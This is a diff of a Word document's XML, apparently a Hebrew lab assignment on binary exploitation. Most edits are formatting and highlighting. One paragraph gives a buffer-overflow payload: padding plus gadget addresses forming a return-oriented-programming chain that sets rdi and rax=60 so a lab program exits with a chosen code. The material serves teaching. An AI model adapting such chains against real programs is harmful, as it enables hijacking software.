                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %r</w:t>
+              <w:t>dd %r15, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7085,7 +7737,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
+              <w:t>r</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7095,8 +7747,19 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>d</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>i</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7308,11 +7971,10 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %rbp</w:t>
+              <w:t>ush %</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7320,8 +7982,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>rbp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7329,8 +7995,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7339,11 +8004,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %rsp, %rbp</w:t>
+              <w:t>m</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7351,7 +8014,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ov %</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7360,8 +8025,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>c</w:t>
+              <w:t>rsp</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7370,8 +8036,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
+              <w:t>, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7380,9 +8047,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>*</w:t>
+              <w:t>rbp</w:t>
             </w:r>
-            <w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7390,8 +8060,59 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>%rax</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">all </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>*</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>%</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7538,8 +8259,21 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
-      </w:r>
+        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>בינארים</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7570,8 +8304,20 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>\xHH</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xHH</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7755,6 +8501,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7776,6 +8523,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7790,6 +8538,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7800,6 +8549,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7811,6 +8561,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x6d\x1b\x40\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
@@ -7825,6 +8576,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7835,6 +8587,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7846,6 +8599,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>0x61=’a’</w:t>
@@ -7856,6 +8610,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7867,6 +8622,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>password</w:t>
@@ -7877,27 +8633,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> ואת הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rbx</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7923,6 +8684,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7934,29 +8696,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x6d\x1b\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x6d\x1b\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7964,6 +8707,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -7975,9 +8719,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rdi”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7985,62 +8754,85 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> מהסעיף הקודם שבעזרתה נעדכן את הערך של </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> שצפוי להכיל את ערך היציאה מהתוכנית לאחר שנבצע </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>syscall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> עבור </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>rax=60</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=60</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8048,6 +8840,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8059,6 +8852,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>exit</w:t>
@@ -8069,6 +8863,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8080,6 +8875,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8091,6 +8887,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8102,29 +8899,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x48\x00\x00\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x48\x00\x00\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8132,27 +8910,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rdi</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8164,9 +8947,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rdi”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8174,6 +8982,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8185,6 +8994,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8196,6 +9006,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8207,29 +9018,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x71\x0e\x40\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x71\x0e\x40\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8237,6 +9029,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8248,9 +9041,34 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>“pop %rax”</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8258,6 +9076,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8269,6 +9088,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8280,6 +9100,7 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8291,29 +9112,10 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\x3c\x00\x00\x00\x00\x00\x00\x00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(\x3c\x00\x00\x00\x00\x00\x00\x00)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8321,27 +9123,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> יכילו את הערך שנרצה שיהיה ב-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rax</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -8353,6 +9160,7 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>60=0x3c</w:t>
@@ -8363,27 +9171,32 @@
           <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
